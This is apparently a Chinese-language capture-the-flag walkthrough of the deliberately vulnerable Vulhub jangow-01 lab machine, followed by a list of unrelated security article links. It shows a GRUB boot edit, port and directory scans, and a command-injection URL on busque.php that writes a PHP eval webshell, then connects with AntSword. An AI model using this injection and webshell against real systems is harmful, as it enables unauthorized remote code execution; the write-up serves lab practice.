Vulhub-jangow-01-1.0.1通关攻略

第0步:

打开靶机,按下shift,出现下图界面

在此页面按下e键,进入如下界面, 将ro 替换为 rw signie init=/bin/bash

替换完毕后,按下Ctrl键+X键,进入如下页面

ip a查看网卡信息

编辑配置文件网卡信息, 英文键盘的斜杠按不出来,需要按数字键盘的斜杠

第一步:确定靶机IP为192.168.179.129
第二步:扫描后台及开放端口
第三步:进行敏感目录及文件扫描
复制代码
#200
http://192.168.179.129/site/index.html (CODE:200|SIZE:10190) 
http://192.168.179.129/site/wordpress/index.html (CODE:200|SIZE:10190) 

#端口
192.168.179.129:80
192.168.179.129:21
第四步:访问扫描出来的可能有价值的文件及端口
第五步:发现可以传参的地方,尝试传一个id,得到结果
第六步:进一步,尝试上传一句话木马
复制代码
#URL
http://192.168.179.129/site/busque.php?buscar=echo '<?php eval($_POST["cmd"]);' > shell.php
第七步:使用蚁剑进行连接
复制代码
#URL地址
http://192.168.179.129/site/shell.php

FROM IYU_

相关推荐
琢磨先生David3 小时前
重构数字信任基石:Java 24 网络安全特性的全维度革新与未来防御体系构建
java·web安全·密码学
20242817李臻5 小时前
李臻20242817_安全文件传输系统项目报告_第9周
数据库·安全
智驱力人工智能6 小时前
无感通行与精准管控:AI单元楼安全方案的技术融合实践
人工智能·安全·智慧城市·智慧园区
见青..7 小时前
【学习笔记】文件包含漏洞--本地远程包含、伪协议、加密编码
前端·笔记·学习·web安全·文件包含
lally.9 小时前
2025蓝桥杯省赛网络安全组wp
web安全·蓝桥杯
CyberSecurity_zhang9 小时前
汽车网络安全 -- 理解暴露面、攻击面和攻击向量
网络安全·信息安全·汽车
极小狐10 小时前
极狐GitLab 的合并请求部件能干什么?
运维·git·安全·gitlab·极狐gitlab
Python私教11 小时前
Rust:安全与性能兼得的现代系统编程语言
java·安全·rust
xiaoniu66713 小时前
毕业设计-基于机器学习入侵检测系统
网络·安全·web安全
iOS开发上架哦15 小时前
charles网络抓包入门教程
网络协议·安全